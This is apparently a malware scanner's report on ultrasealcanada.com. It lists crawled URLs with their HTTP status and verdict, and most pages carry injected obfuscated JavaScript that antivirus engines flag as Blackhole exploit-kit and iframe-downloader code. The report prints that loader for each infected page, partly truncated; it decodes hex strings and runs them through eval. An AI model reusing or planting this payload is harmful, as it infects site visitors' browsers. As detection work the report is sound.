Request | Server response | Status |
http://ultrasealcanada.com/ | 200 OK Content-Length: 10076 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xvwm="s"+"p"+"l"+"i"+"t";obgpq=window;okajv=document;wlru="0"+"x";hmm=(5-3-1);try{++(okajv.body)}catch(bggi){pynadu=false;try{}catch(qlaeqw){pynadu=21;}if(1){zmvv="17:5d:6c:65:5a:6b:60:66:65:17:66:5b:61:5f:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:61:5f:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3571 bytes are skipped ...9:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:61:5f:5a:27:30:1f:20:32:4:1:74:4:1:74"[xvwm](":");}obgpq=zmvv;mephwo=[];for(qvo=22-20-2;-qvo+1436!=0;qvo+=1){zzhzyr=qvo;if((0x19==031))mephwo+=String.fromCharCode(eval(wlru+obgpq[1*zzhzyr])+0xa-hmm);}hrzwiv=eval;hrzwiv(mephwo)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Bkav
- MW.Clod938.Trojan.df51
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- TrendMicro-HouseCall
- TROJ_GEN.F47V1031
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://ultrasealcanada.com/index.html | 200 OK Content-Length: 10076 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xvwm="s"+"p"+"l"+"i"+"t";obgpq=window;okajv=document;wlru="0"+"x";hmm=(5-3-1);try{++(okajv.body)}catch(bggi){pynadu=false;try{}catch(qlaeqw){pynadu=21;}if(1){zmvv="17:5d:6c:65:5a:6b:60:66:65:17:66:5b:61:5f:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:61:5f:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3571 bytes are skipped ...9:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:61:5f:5a:27:30:1f:20:32:4:1:74:4:1:74"[xvwm](":");}obgpq=zmvv;mephwo=[];for(qvo=22-20-2;-qvo+1436!=0;qvo+=1){zzhzyr=qvo;if((0x19==031))mephwo+=String.fromCharCode(eval(wlru+obgpq[1*zzhzyr])+0xa-hmm);}hrzwiv=eval;hrzwiv(mephwo)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Bkav
- MW.Clod938.Trojan.df51
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- TrendMicro-HouseCall
- TROJ_GEN.F47V1031
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://ultrasealcanada.com/about-us.html | 200 OK Content-Length: 10865 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xvwm="s"+"p"+"l"+"i"+"t";obgpq=window;okajv=document;wlru="0"+"x";hmm=(5-3-1);try{++(okajv.body)}catch(bggi){pynadu=false;try{}catch(qlaeqw){pynadu=21;}if(1){zmvv="17:5d:6c:65:5a:6b:60:66:65:17:66:5b:61:5f:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:61:5f:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3571 bytes are skipped ...9:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:61:5f:5a:27:30:1f:20:32:4:1:74:4:1:74"[xvwm](":");}obgpq=zmvv;mephwo=[];for(qvo=22-20-2;-qvo+1436!=0;qvo+=1){zzhzyr=qvo;if((0x19==031))mephwo+=String.fromCharCode(eval(wlru+obgpq[1*zzhzyr])+0xa-hmm);}hrzwiv=eval;hrzwiv(mephwo)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Bkav
- MW.Clod938.Trojan.df51
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- TrendMicro-HouseCall
- TROJ_GEN.F47V1031
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://widgets.twimg.com/j/2/widget.js | 200 OK Content-Length: 1489 Content-Type: application/javascript | clean |
http://ultrasealcanada.com/fleet.html | 200 OK Content-Length: 14846 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xvwm="s"+"p"+"l"+"i"+"t";obgpq=window;okajv=document;wlru="0"+"x";hmm=(5-3-1);try{++(okajv.body)}catch(bggi){pynadu=false;try{}catch(qlaeqw){pynadu=21;}if(1){zmvv="17:5d:6c:65:5a:6b:60:66:65:17:66:5b:61:5f:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:61:5f:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3571 bytes are skipped ...9:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:61:5f:5a:27:30:1f:20:32:4:1:74:4:1:74"[xvwm](":");}obgpq=zmvv;mephwo=[];for(qvo=22-20-2;-qvo+1436!=0;qvo+=1){zzhzyr=qvo;if((0x19==031))mephwo+=String.fromCharCode(eval(wlru+obgpq[1*zzhzyr])+0xa-hmm);}hrzwiv=eval;hrzwiv(mephwo)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Bkav
- MW.Clod938.Trojan.df51
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- TrendMicro-HouseCall
- TROJ_GEN.F47V1031
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://ultrasealcanada.com/benefits.html | 200 OK Content-Length: 22693 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xvwm="s"+"p"+"l"+"i"+"t";obgpq=window;okajv=document;wlru="0"+"x";hmm=(5-3-1);try{++(okajv.body)}catch(bggi){pynadu=false;try{}catch(qlaeqw){pynadu=21;}if(1){zmvv="17:5d:6c:65:5a:6b:60:66:65:17:66:5b:61:5f:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:61:5f:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3571 bytes are skipped ...9:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:61:5f:5a:27:30:1f:20:32:4:1:74:4:1:74"[xvwm](":");}obgpq=zmvv;mephwo=[];for(qvo=22-20-2;-qvo+1436!=0;qvo+=1){zzhzyr=qvo;if((0x19==031))mephwo+=String.fromCharCode(eval(wlru+obgpq[1*zzhzyr])+0xa-hmm);}hrzwiv=eval;hrzwiv(mephwo)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Bkav
- MW.Clod938.Trojan.df51
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- TrendMicro-HouseCall
- TROJ_GEN.F47V1031
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://ultrasealcanada.com/SpryAssets/SpryCollapsiblePanel.js | 200 OK Content-Length: 23266 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
qflidd="s"+"p"+"l"+"i"+"t";tbjw=window;vtq=document;agx="0"+"x";coosr=(5-3-1);try{++(vtq.body)}catch(owqk){quopz=false;try{}catch(kbxi){quopz=21;}if(1){eye="17:5d:6c:65:5a:6b:60:66:65:17:62:66:68:6a:65:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b
... 3816 bytes are skipped ...58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:62:66:68:6a:65:27:30:1f:20:32:4:1:74:4:1:74"[qflidd](":");}tbjw=eye;rhxqb=[];for(oyr=22-20-2;-oyr+1436!=0;oyr+=1){ufguir=oyr;if((0x19==031))rhxqb+=String.fromCharCode(eval(agx+tbjw[1*ufguir])+0xa-coosr);}fflua=eval;fflua(rhxqb)}
Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- K7AntiVirus
- Trojan ( 85a43f9d0 )
- Emsisoft
- JS:Exploit.BlackHole.KU (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- F-Prot
- JS/IFrame.RS
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- Commtouch
- JS/IFrame.RS
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://ultrasealcanada.com/testing.html | 200 OK Content-Length: 14012 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xvwm="s"+"p"+"l"+"i"+"t";obgpq=window;okajv=document;wlru="0"+"x";hmm=(5-3-1);try{++(okajv.body)}catch(bggi){pynadu=false;try{}catch(qlaeqw){pynadu=21;}if(1){zmvv="17:5d:6c:65:5a:6b:60:66:65:17:66:5b:61:5f:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:61:5f:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3571 bytes are skipped ...9:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:61:5f:5a:27:30:1f:20:32:4:1:74:4:1:74"[xvwm](":");}obgpq=zmvv;mephwo=[];for(qvo=22-20-2;-qvo+1436!=0;qvo+=1){zzhzyr=qvo;if((0x19==031))mephwo+=String.fromCharCode(eval(wlru+obgpq[1*zzhzyr])+0xa-hmm);}hrzwiv=eval;hrzwiv(mephwo)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Bkav
- MW.Clod938.Trojan.df51
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- TrendMicro-HouseCall
- TROJ_GEN.F47V1031
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://ultrasealcanada.com/Opportunities.html | 200 OK Content-Length: 12798 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xvwm="s"+"p"+"l"+"i"+"t";obgpq=window;okajv=document;wlru="0"+"x";hmm=(5-3-1);try{++(okajv.body)}catch(bggi){pynadu=false;try{}catch(qlaeqw){pynadu=21;}if(1){zmvv="17:5d:6c:65:5a:6b:60:66:65:17:66:5b:61:5f:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:61:5f:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3571 bytes are skipped ...9:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:61:5f:5a:27:30:1f:20:32:4:1:74:4:1:74"[xvwm](":");}obgpq=zmvv;mephwo=[];for(qvo=22-20-2;-qvo+1436!=0;qvo+=1){zzhzyr=qvo;if((0x19==031))mephwo+=String.fromCharCode(eval(wlru+obgpq[1*zzhzyr])+0xa-hmm);}hrzwiv=eval;hrzwiv(mephwo)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Bkav
- MW.Clod938.Trojan.df51
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- TrendMicro-HouseCall
- TROJ_GEN.F47V1031
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://ultrasealcanada.com/Testing.html | 200 OK Content-Length: 14012 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xvwm="s"+"p"+"l"+"i"+"t";obgpq=window;okajv=document;wlru="0"+"x";hmm=(5-3-1);try{++(okajv.body)}catch(bggi){pynadu=false;try{}catch(qlaeqw){pynadu=21;}if(1){zmvv="17:5d:6c:65:5a:6b:60:66:65:17:66:5b:61:5f:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:61:5f:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3571 bytes are skipped ...9:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:61:5f:5a:27:30:1f:20:32:4:1:74:4:1:74"[xvwm](":");}obgpq=zmvv;mephwo=[];for(qvo=22-20-2;-qvo+1436!=0;qvo+=1){zzhzyr=qvo;if((0x19==031))mephwo+=String.fromCharCode(eval(wlru+obgpq[1*zzhzyr])+0xa-hmm);}hrzwiv=eval;hrzwiv(mephwo)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Bkav
- MW.Clod938.Trojan.df51
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- TrendMicro-HouseCall
- TROJ_GEN.F47V1031
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://ultrasealcanada.com/mobile/index.html | 200 OK Content-Length: 5477 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) xvwm="s"+"p"+"l"+"i"+"t";obgpq=window;okajv=document;wlru="0"+"x";hmm=(5-3-1);try{++(okajv.body)}catch(bggi){pynadu=false;try{}catch(qlaeqw){pynadu=21;}if(1){zmvv="17:5d:6c:65:5a:6b:60:66:65:17:66:5b:61:5f:5a:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:66:5b:61:5f:5a:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:
... 3571 bytes are skipped ...9:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:66:5b:61:5f:5a:27:30:1f:20:32:4:1:74:4:1:74"[xvwm](":");}obgpq=zmvv;mephwo=[];for(qvo=22-20-2;-qvo+1436!=0;qvo+=1){zzhzyr=qvo;if((0x19==031))mephwo+=String.fromCharCode(eval(wlru+obgpq[1*zzhzyr])+0xa-hmm);}hrzwiv=eval;hrzwiv(mephwo)}Antivirus reports:- AntiVir
- EXP/JS.Expack.GQ
- Avast
- JS:Decode-BML [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.KU
- Bkav
- MW.Clod938.Trojan.df51
- Ikarus
- Virus.JS.Exploit
- nProtect
- JS:Exploit.BlackHole.KU
- TrendMicro-HouseCall
- TROJ_GEN.F47V1031
- Comodo
- Exploit.JS.Expack.G
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- Kaspersky
- Trojan-Downloader.JS.Iframe.deu
- MicroWorld-eScan
- JS:Exploit.BlackHole.KU
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.cgxcgz
- F-Secure
- JS:Exploit.BlackHole.KU
- VIPRE
- Exploit.JS.Blacole.nx (v)
- AVG
- JS/Redir
- Norman
- Kryptik.CCLX
- GData
- JS:Exploit.BlackHole.KU
- ESET-NOD32
- JS/Kryptik.AOG
- BitDefender
- JS:Exploit.BlackHole.KU
|
http://ultrasealcanada.com/test404page.js | 404 Not Found Content-Length: 5368 Content-Type: text/html | clean |
http://ultrasealcanada.com/file://faultRequestLogPath | 404 Not Found Content-Length: 5390 Content-Type: text/html | clean |
http://ultrasealcanada.com/file://file://faultRequestLogPath | 404 Not Found Content-Length: 5402 Content-Type: text/html | clean |
http://ultrasealcanada.com/file://file://file://faultRequestLogPath | 404 Not Found Content-Length: 5414 Content-Type: text/html | clean |